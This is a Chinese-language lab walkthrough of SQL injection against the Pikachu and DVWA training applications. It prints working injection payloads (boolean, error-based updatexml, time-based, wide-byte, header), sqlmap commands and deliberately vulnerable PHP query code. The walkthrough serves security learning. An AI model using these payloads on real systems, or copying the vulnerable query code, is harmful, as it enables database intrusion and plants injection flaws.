pikachu

pikachu => 备份地址

SQL-Inject

概述

SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台进行处理时，未对数据做严格的判断，导致传入的恶意内容拼接 到SQL语句中，被当做SQL语句的一部分执行，从而导致数据库受损。

• 防范SQL注入策略

  • 对前端传递来的数据进行过滤，不允许危险字符传入

  • 使用参数化查询的方式(Parameterized Query/Parameterized Statement)

  • 目前很多ORM框架也提供了SQL拼接方式查询，使用时需要注意

数字型注入(post)

• 手动注入

  使用burpsuite抓到包后，在请求参数后添加boolean为真的语句。观察是否检索结果有不同。
  全部结果检索出来，SQL注入成功。

  1	id=2 or true#&submit=%E6%9F%A5%E8%AF%A2

• sqlmap

  使用burpsuite抓包后将请求信息保存至文件，由sqlmap对id进行注入。

  1	sqlmap -r number.txt --level=5 --risk=3 -p id --dbs --batch

字符型注入(get)

• 手动注入

  使用burpsuite抓到包后，在请求参数后添加boolean为真的语句。观察是否检索结果有不同。
  值得注意的是,由于GET参数拼接在URL中，因此最好将注入的内容进行URL编码。

  1 2 3

  # + => 空格 # %23 => # /pikachu/vul/sqli/sqli_str.php?name=vience'or+true%23&submit=%E6%9F%A5%E8%AF%A2

• sqlmap

  使用burpsuite抓包后将请求信息保存至文件，由sqlmap进行对name进行注入。

  1	sqlmap -r charsequence.txt --level=5 --risk=3 -p name --dbs --batch

搜索型注入

• 手动注入

  与字符型注入相同。

  1	/pikachu/vul/sqli/sqli_search.php?name=vi'or+true%23&submit=%E6%90%9C%E7%B4%A2

• sqlmap

  使用burpsuite抓包后将请求信息保存至文件，由sqlmap进行对name进行注入。

  1	sqlmap -r search.txt --level=5 --risk=3 -p name --dbs --batch

xx型注入

• 手动注入

  与字符型注入相同。
  

  1	/pikachu/vul/sqli/sqli_x.php?name=hello'or+true%23&submit=%E6%9F%A5%E8%AF%A2

  经尝试，会报SQL错误，因此可能是SQL语句未闭合。

  1	/pikachu/vul/sqli/sqli_x.php?name=hello')or+true%23&submit=%E6%9F%A5%E8%AF%A2

• sqlmap

  与字符型注入相同。

  1	sqlmap -r xx.txt --level=5 --risk=3 -p name --dbs --batch

  得到payload为有)的闭合语句。

  1	name=hello') AND 7065=(SELECT (CASE WHEN (7065=7065) THEN 7065 ELSE (SELECT 1143 UNION SELECT 7507) END))-- -&submit=%E6%9F%A5%E8%AF%A2

insert/update注入

可以应用报错注入。获得关心的信息。
此次利用了updatexml(xml_document, XPath, new_Value)函数中，XPath中不可包含~字符，因此使用0x7e时，一定会报错。 当程序开启了报错打印后，报错信息就会显示在页面上。

1
2
3
4

# 构造insert into table(name, passwd)values('ABC', '123'); 中`ABC`为以下内容
# name' or updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir), 0)or'
# 构造的URL完整参数部分
username=name' or updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir), 0)or'&password=123&sex=&phonenum=&email=&add=&submit=submit

得到结果XPATH syntax error: '~pikachu~pikachu@localhost~C:\xa'。

delete注入

与insert/update注入相同,使用报错注入。

构造对应URL。

1
2
3
4
5

# URLencode
# %40 ==> @
# %23 ==> #
# /pikachu/vul/sqli/sqli_del.php?id=updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),0)#
/pikachu/vul/sqli/sqli_del.php?id=updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,%40%40datadir),0)%23

得到结果XPATH syntax error: '~pikachu~pikachu@localhost~C:\xa'。

http header注入

尝试对HTTP头进行修改后发包，发现会有SQL报错，因此对HTTP头的属性进行注入。
此次对User-Agent进行注入。

1

User-Agent: 'or updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),0)or'#

得到结果XPATH syntax error: '~pikachu~pikachu@localhost~C:\xa'。

盲注(base on boolean)

• 手动注入

  针对name做注入，值得注意的是，pikachu对返回件数有判断，因此使用limit语句限制返回件数。

  1 2	# # => %23 /pikachu/vul/sqli/sqli_blind_b.php?name=hello'+or+true+limit+1%23&submit=%E6%9F%A5%E8%AF%A2

• sqlmap

  与字符型注入相同。

  1	sqlmap -r boolean.txt --level=5 --risk=3 -p name --dbs --batch

  得到报错payload。

  1 2	# 需要自行`URLencode`,注意`name=`中的`=`不要`encode` name=hello'||(SELECT 0x6e6b7342 WHERE 6588=6588 AND (SELECT 7080 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(7080=7080,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&submit=%E6%9F%A5%E8%AF%A2

盲注(base on time)

• 手动注入

  针对name注入，基于时间盲注，查看页面响应时间。

  1 2	# 检索时等待5s /pikachu/vul/sqli/sqli_blind_t.php?name=kobe'+and+sleep(5)%23&submit=%E6%9F%A5%E8%AF%A2

  基于时间的盲注一般与if分支结合。

  if(condition, case1, case2)意为:

  1 2 3 4 5

  if condition case1 else case2 endif

  当数据库的名称首字母为a时，页面等待5s，否则正常。
  数据库的名字为pikachu，与a不相等，因此正常响应。

  1 2	# if(substr(database(),1,1)='a',sleep(5),null) /pikachu/vul/sqli/sqli_blind_t.php?name=kobe'+and+if(substr(database(),1,1)%3d'a',sleep(5),null)%23&submit=%E6%9F%A5%E8%AF%A2

  当数据库的名称首字母为p时，页面等待5s，否则正常。
  此次响应等待了5s，因此可以判断数据库的名字的首字母为p。

  1 2	# if(substr(database(),1,1)='p',sleep(5),null) /pikachu/vul/sqli/sqli_blind_t.php?name=kobe'+and+if(substr(database(),1,1)%3d'p',sleep(5),null)%23&submit=%E6%9F%A5%E8%AF%A2

宽字节注入

• 手动注入

  针对name注入。

  1 2	# 单引号前增加`%df` name=hello%df%27or+true%23&submit=%E6%9F%A5%E8%AF%A2

DVWA

DVWA => 备份地址

SQL Injection(Blind)(sql注入 盲注)

在SQL注入过程中并不会给客户端返回查询到的内容。
用来对程序对应的数据存储区进行对应的探测。

盲注分类

盲注主要有两种：基于时间,基于布尔的盲注。

• 基于时间的盲注

  通过向SQL中注入sleep(int x)，观察响应时间是否有对应延迟，如果有,则数据是存储在数据库中。

  例如：
  

  1 2 3

  `--`或`#` 用来注释掉注入点之后的语句。 select * from tableA A where A.colA = '1' # and A.colB = '2'; select * from tableA A where A.colA = '1' -- and A.colB = '2';

  1 2	# 查询并等待5s 1' and sleep(5) #

• 基于布尔的盲注

  通过向SQL中注入and 1=1或and 1=2，观察响应内容是否不同，如果不同，则数据是存储在数据库中。

  例如：
  

  1 2	# 注入true 1' 1=1 #

  1 2	# 注入false 1' 1=2 #

Low

• 手动测试

  • 在注入点注入基于时间的盲注

    能够观察到有明显的延迟。

    1	1' and sleep(5)#

  • 在注入点注入基于布尔的盲注

    能够观察到两种布尔值对应的回应不相同。

    1 2	1' and 1=1# 1' and 1=2#

• 源码分析

  • 直接从request中获取参数(GET)

    1 2	// Get input $id = $_GET[ 'id' ];

  • 直接将参数拼接入SQL文中执行

    1 2 3

    // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

  • 根据查询结果返回对应页面

    1 2 3 4 5 6 7 8 9

    if ($exists) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; }

Medium

• 手动测试

  使用burpsuit拦截后，与Low级别相同。

  针对mysqli_real_escape_string()的制御，可以将注入内容url encode，进行绕过。

• 源码分析

  • 直接从request中获取参数(POST)

    1 2 3

    // Get input $id = $_POST[ 'id' ]; $exists = false;

  • 将参数转义特殊字符后拼接入SQL执行

    1 2 3 4 5 6

    // 使用`mysqli_real_escape_string()`函数转义特殊字符。 $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

  • 根据查询结果返回对应页面

    与Low级别相同。

High

• burpsuit 测试

  • 抓包，找到注入点

    1 2 3 4 5 6 7 8 9 10 11 12

    GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1 Host: train.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://train.com/dvwa/security.php Connection: close Cookie: id=2; security=high; PHPSESSID=9jcja8m0r7k7h2je6ife9ivmaj Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache

  • 针对Cookie: id=$2$注入

    与Low级别相同，可得盲注结果。

• 源码分析

  • 从cookie中获取参数

    1 2 3

    // Get input $id = $_COOKIE[ 'id' ]; $exists = false;

  • 将参数直接拼接入SQL执行

    限制查询条数。

    1 2 3

    // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); // Removed 'or die' to suppress mysql errors

  • 根据查询结果返回对应页面

    与Low级别相同。

Impossible

• 源码分析

  • 通过token验证身份

    1 2 3

    // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); $exists = false;

  • 从request中获取参数(GET)

    与Low级别相同。

  • 以PDO方式预编译SQL参数查询

    1 2 3 4 5 6

    // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); $data->execute(); $exists = $data->rowCount();

  • 根据查询结果返回对应页面

    与Low级别相同。